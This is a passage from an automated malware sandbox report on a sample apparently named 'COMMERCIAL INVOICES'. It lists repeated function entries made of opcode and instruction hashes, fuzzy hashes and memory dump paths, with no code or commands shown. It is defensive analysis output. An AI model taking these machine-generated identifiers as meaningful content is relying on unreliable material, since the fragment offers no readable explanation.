                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3acca1060177d1f63cb0dc581e58169abc28fd7072266ac93b449a1d14556856
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED418231A20229DBDF25DF6CC940BEE77B8EF45740F0100A5EA08AB241D7749E80CB95
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 897109db6efb963513f40031d91fdea3b42b5a02d92ee5bf9fe20e2cdf9c6cbe
                                                                                                                                                                                                                                      • Instruction ID: 17e28e47700fe5b2cabd2f82d3f88e02580b0952832beec6c6613a8cfc646fd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897109db6efb963513f40031d91fdea3b42b5a02d92ee5bf9fe20e2cdf9c6cbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB4103B1E34616EFCB11DF18C880AA8B7B1FF94760F208329E955AB280D774ED418BD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c0ccf5b02ff92cdfac4ea7f410b698e171bb494245f5483d2917d14a7712e304
                                                                                                                                                                                                                                      • Instruction ID: b94992dea05a87848ce64dce7876559d20580428d78df82d8857da6904669558
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0ccf5b02ff92cdfac4ea7f410b698e171bb494245f5483d2917d14a7712e304
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41C376514652DFC320DF68D840A7AB7E9FFC8B40F24061DFA9597680E730E905C7AA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f31d760f88d0564539d9edaedc435ac6c8146c9f98ed937c0922d16cbe95884c
                                                                                                                                                                                                                                      • Instruction ID: 2bfcd0c1bd08828e39effc7d94a0901f7b15de4f544bbd334083d24364fdc246
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f31d760f88d0564539d9edaedc435ac6c8146c9f98ed937c0922d16cbe95884c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41D3756203438FE729EF28D884B3ABBE9FF80364F14442DEA458B2A1DB70D901DB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f89bbfabaff2944a12535c17846e977a64dd82a0207392e4ed249ce835841378
                                                                                                                                                                                                                                      • Instruction ID: 8943e97317b2c30ec11813a0fd5f42dee4ff592a4298958d8e99b1d0007af15d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f89bbfabaff2944a12535c17846e977a64dd82a0207392e4ed249ce835841378
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 554183B1A21606CFCB19DF6DC9809ADB7F2FFD8320B14862AE566AB250D7349941CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                      • Instruction ID: ced90da819e68c1c20145ed23f4fdad8e860138e05ff264eecae1e49ca936622
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1312831A20245BFDB529B68CC84BABBFE9AF14350F044165F815D7393C2B4D944CBA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8c58d8f0ce56722c3f81327bce7461facb5d97d3938c90adb4e6ef0ce2757559
                                                                                                                                                                                                                                      • Instruction ID: b7cadb75dcd1ca0d1fc2ee62851a2b819b36ed97e04919b395a75f19e1c43e3c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c58d8f0ce56722c3f81327bce7461facb5d97d3938c90adb4e6ef0ce2757559
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD31A635760756ABD722AF659C95FBB76E9EB58B50F410028FA00AB2D1DAB4DC00C7A0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6a03a570abd671e91046d0cdd4e7da54bff751e9f08c63a68c542d907a9f69dc
                                                                                                                                                                                                                                      • Instruction ID: 7c84262ca304b9f7cc8e0e0fc7cd8865f9db3fef9344799b41b998250989f06e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a03a570abd671e91046d0cdd4e7da54bff751e9f08c63a68c542d907a9f69dc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8931E172625242DFC321EF19D881F26B7F9FB80360F09447EEA958B251D770A900CB94
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 81b6d7b9d709d6a3d6ec81fb36bb42ce903f4f74b361176516473c99575024e2
                                                                                                                                                                                                                                      • Instruction ID: 59ec97e3a0ed50c66bbc0d92f1b3be652ff5b956d535a05b1882d05e415739da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b6d7b9d709d6a3d6ec81fb36bb42ce903f4f74b361176516473c99575024e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41C071220B46DFD726DF28C481FEA7BE9BF55754F10842DEA998B250C770E804CB64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd

Memory Dump Source (identical for every function entry below)
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID, String ID and API String ID are left empty for every entry below
• Opcode Fuzzy Hash is identical to Opcode ID in every entry below, so it is not repeated

Function entries
• Opcode ID: 4dc9a7d0c9ab1bc9f6c59657f57c980670ad11352211f7b63a1d0f0ac8171197
• Instruction ID: 02386b51e6590de2bf2f7528e837e6d38ee61b5656e134100dadbdc5a9f84a8f
• Instruction Fuzzy Hash: ED31BC716242429FD320EF29C881F2BB7E9FB84720F05453DEB598B291E770E900CBA5

• Opcode ID: 87d6628bf6c441c902dbcb062c332d680bdea5b84562a3073d3acbb626a59505
• Instruction ID: 3dc3bb95b8fd3805364fa9d8f3554b23af68b89ee1142233292fdc94237a82e0
• Instruction Fuzzy Hash: 9231EA312216839BF322975DCDC8BE57BD4BF507C4F1E00A4AF46876D2EB68D840C225

• Opcode ID: 363952c864327500ad2d591e79113f442fd2dceda177e696e22be1b651a70029
• Instruction ID: af408dd725116513161794c70fcbfb89633158caf1f386a2eecaf02793034ff5
• Instruction Fuzzy Hash: FD31E675A00256ABDB16DF98CC51FBEB7F9FB44B44F454168E900AB284D770ED10CB94

• Opcode ID: 82535396958456fc679442cfee7f87c52af5a090da4f95af1749f7cf75e22ae9
• Instruction ID: 8961f69928ee0881a2f03e30ec6fa0bb0f3ea3b121d9e13c6a18f3ea7a70590c
• Instruction Fuzzy Hash: 56317536A5016DABCF21EF54DC88BDE7BF9AB98310F1000A5A908E7250CA30DE918F90

• Opcode ID: c4a9dcd5d01b6cea491958516e8afd39b554f5231f3076b4426aa43b71f73692
• Instruction ID: 2c72ad7ab46d94957a8e0b9d353fb2cc454121a8e8e7c4c62df37382c4414c1f
• Instruction Fuzzy Hash: 2A31D576E20615AFDB21DFA9C840AAEBBBCFF04750F014425EA15E7290E6709E408BA0

• Opcode ID: 7570f1f9f15822e8cc14acc9e287a1809fda99725ef816733012db643915b98d
• Instruction ID: 27d4a33fad5ab05b3cafb4545dc06932a790775acc21c171643448cec8a73fca
• Instruction Fuzzy Hash: 4731C2B1B40606EBDB179B99CC61A6AB7F9AF44758F004069E506EB386DA30DC108B90

• Opcode ID: ca2a4f734d02a910bf02f5dc214f4f29c69733a9587c7c7ea10790d56c408093
• Instruction ID: e953ecd83a0924fd049b76e5b5fa9ce4c4eae21972a4162b4d60df6a15d7fb13
• Instruction Fuzzy Hash: 38314972A24702DBD716DE288880EBFBBA5AFD4250F014428FE5597300EA30DC4187E9

• Opcode ID: 5deb2f11f773139309fb9fda6f5ae040829333cad2da088fdcc744f2b44eb8a0
• Instruction ID: 486ac0cbfa246d0fd5a9ce49d1fb243d3b6c066d55fb7d387ffdbcec7f4fb59e
• Instruction Fuzzy Hash: 97317CB1629302CFE724CF59C840B2BBBE5FB98710F45496DEA8497255D770E848CB91

• Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction ID: b429ba880844b66c7c07c7048af6c672151666dd4bf3c41d29ab24e720ccf6fa
• Instruction Fuzzy Hash: F1312E72B10701AFD765CF6DCD81B5BBBF8AB08750F08052DA65AC3650E630E900CB50

• Opcode ID: 9034b42f71873d2d8f847eb289dddf74c5a103e21d98f0103313df132b28a977
• Instruction ID: 0df1a613d9ceed83a3da932e820edfd8bff35eb731999fa87ecd006d734c821c
• Instruction Fuzzy Hash: 3D31DAB1515302DFC711DF19C48896ABBF1FF89208F8589AEF9889B351D331DA44CB96

• Opcode ID: 89b17e9dc27ff140769132952bfd286ccdb82f7609bc0a0ff79a2e1e6555d93d
• Instruction ID: ceefde46c7cd371ff99eae68435d9b4371a56194a75c1da1dd69f4681a36063a
• Instruction Fuzzy Hash: E2312631B202869FC724FFB8C882A6E7BFDEB84704F108529D581D7294D730D981CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                                                                      • Instruction ID: 451ac5a713f5def5c956169eb6e87446d4cbf3f7843184ed593c48d371416978
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB213472E6025BAADB00DBB98801BBFBBB5AF50740F0584369E15F7340E270D90087A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4de20605849454baa15e8e5050a987bc1e84ca960d4aaeb1dd747c6b2024fcda
                                                                                                                                                                                                                                      • Instruction ID: be66ce598f51e6983e63c3f66653ed6fd2c5ddbe3f2875d48eeff589ef87baeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4de20605849454baa15e8e5050a987bc1e84ca960d4aaeb1dd747c6b2024fcda
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24317DB15102059FDF35AF6CCC41BB97774EF40314F448169DE859B382DA74D982DB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                      • Instruction ID: 3ab2f1d66d5ebf4d8345cfd91e0ca5be3af08b0f97a1659c51c8e8978066fd68
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6210D3E62065AB6CB15ABA58C00EBBFBB5EF50710F40843EFB9587691E634D960C760
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 18d8540a7e6a8ac323a267221736ab01b87c2c09f89d2b509b0fe5e31e10e7b7
                                                                                                                                                                                                                                      • Instruction ID: be9f9f195fc39cf4aa837bb7b2e1d6a9de397105eba843c661973007466f603e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18d8540a7e6a8ac323a267221736ab01b87c2c09f89d2b509b0fe5e31e10e7b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC310872A2112D9BDB31DF18DC41FEE77B9EB54740F0200A1E745A7290D6B09E848FA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                      • Instruction ID: 70232b4a55b37fcb19062899b00b9f0acfccf4a9ae4dea06d30c0427b7e8e220
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE219F76A10659EFCB11EF98C980A9FBBB9FF48314F108069EE159B241D670EE05CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1ef2d503e612d1a54077997e92778a9cf4a10262ec62701f0942f270e88493b1
                                                                                                                                                                                                                                      • Instruction ID: 112599f299301088b010e35614a970e4fe7cfac38058414da8738b50fb0671b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ef2d503e612d1a54077997e92778a9cf4a10262ec62701f0942f270e88493b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4421C3726247969BC722EF18D881F6BB7E9FF98760F004519FE549B641D730E900CBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                      • Instruction ID: 687858912588ad68b4e077b2950490a936e6cb585c1f367b8737ecb3d31f27ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C731CB71620605EFEB21DF68C984F6AB7F9FF84354F1144A8E6128B280E770EE02CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3d18f82280666cac04233c6e4f51bae4e235322c960e91c1b11b0518da1c9e78
                                                                                                                                                                                                                                      • Instruction ID: 33cef1e4f027423090677af4983d613d5e38d7fa4ad7a86998c8a6ac6f94a2d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d18f82280666cac04233c6e4f51bae4e235322c960e91c1b11b0518da1c9e78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C531C075A20206EFCB14DF1CC8859EEB7B9FF94350B16445AE80A9B391E770EA40CF94
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 02d09a4147ea8f1e6b8664396d7936cfa191b2b1230f6a33a907ad18258b21fb
• Instruction ID: 9059b814616d1097882e7966a4646d3d49afe163fe7448b3e5ed5a4ccc8a6113
• Opcode Fuzzy Hash: 02d09a4147ea8f1e6b8664396d7936cfa191b2b1230f6a33a907ad18258b21fb
• Instruction Fuzzy Hash: FC21A07591012ADBCF15DF59C881ABEB7F8FF48740F400069FA41AB240D738AD51CBA4
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8fade1e1736a9dc90add951fb303b8aee22f57551b46327e1d1cacaa9b114d3
• Instruction ID: 7f3801719cc11d881e3375805f739957966fb652372949dba8f7a6d81fdd498a
• Opcode Fuzzy Hash: c8fade1e1736a9dc90add951fb303b8aee22f57551b46327e1d1cacaa9b114d3
• Instruction Fuzzy Hash: 9F218975620645EBD715DB6CC880A6AB7B8FF88B80F140169FA04DB6A0D634ED40CBA8
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18384324abe74b7e4fe3681b0f9ed9608a93a6c1a432e2e905ec0e7a4d65f38e
• Instruction ID: ba8c7dd2ff806ec4371c063cfd13d0d3b1ec4bba7b991e09f80af65f7f45bb33
• Opcode Fuzzy Hash: 18384324abe74b7e4fe3681b0f9ed9608a93a6c1a432e2e905ec0e7a4d65f38e
• Instruction Fuzzy Hash: F621B372924346DFD711EF59C844B6BBBECAF91A40F08055ABF80CB251D734D944C7A6
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 504f32862b16f82125b05d751bca65d8e498a62488d8ecbcaf5cf303cb692345
• Instruction ID: 2aa4f238c4f24ab516db6b9e5f1bd519f0294040d9b85116d2d0f44e34a86526
• Opcode Fuzzy Hash: 504f32862b16f82125b05d751bca65d8e498a62488d8ecbcaf5cf303cb692345
• Instruction Fuzzy Hash: 68210B31675A82DBE322976C8C44B387B99BF41B74F190364FB619B6D2D768C841C250
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a439e2116a6841253b088f0b75f212432b2b530667182ef6408dfa44bf90f13f
• Instruction ID: 7784937095c78fb93e2f729653c46dae32066f8b55c3b4241b0399d8f04d8fb8
• Opcode Fuzzy Hash: a439e2116a6841253b088f0b75f212432b2b530667182ef6408dfa44bf90f13f
• Instruction Fuzzy Hash: 3521BE752216019FC725DF29CC41B5677F5FF48754F188468E509CBB61E371E842CB98
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 555e6d9dad00fd477686cac8b8b175a5ca5dc80a11e80e55c9987d72b250a5a1
• Instruction ID: 2bc7f1ede64ed91bd8ba3505b4af4d11dc5a717dc6e5bdd473d93422ea7837df
• Opcode Fuzzy Hash: 555e6d9dad00fd477686cac8b8b175a5ca5dc80a11e80e55c9987d72b250a5a1
• Instruction Fuzzy Hash: 6611A7726A0B11BFD7225555AC45F67B69ADBD4B60F11003CB71CDB290DB70DC018795
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3843e602d062089ecf01b48d5646a20fce6e1ab9b56cbc0c22061410ffdfd8c7
• Instruction ID: e35ee57a4c20eed9ddb3bbacc6386c5e11f2e8658e22ad2048119237f2583919
• Opcode Fuzzy Hash: 3843e602d062089ecf01b48d5646a20fce6e1ab9b56cbc0c22061410ffdfd8c7
• Instruction Fuzzy Hash: FF21E9B5E10219ABDB24DFAAD881AAEFBF8FF98B10F10412EE505A7244D7709941CB54
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
• Instruction ID: 6685a832cc0e79852508d36eac454f378432a8f5ffb667e51edebb9769199f44
• Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
• Instruction Fuzzy Hash: 84218C72A1020AEFDF129FA8CC40BAEBBB9EF98350F204459F940A7251D774D9509B50
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
• Instruction ID: 29de1ecf54d2fb19f5f0f4243312499ba0524f830bec260db9fc3d012c1d8c10
• Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
• Instruction Fuzzy Hash: FE11E272611606AFD7229B44DC41FABBBB9EB81754F100029F7018B180D6B1ED48DB54
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
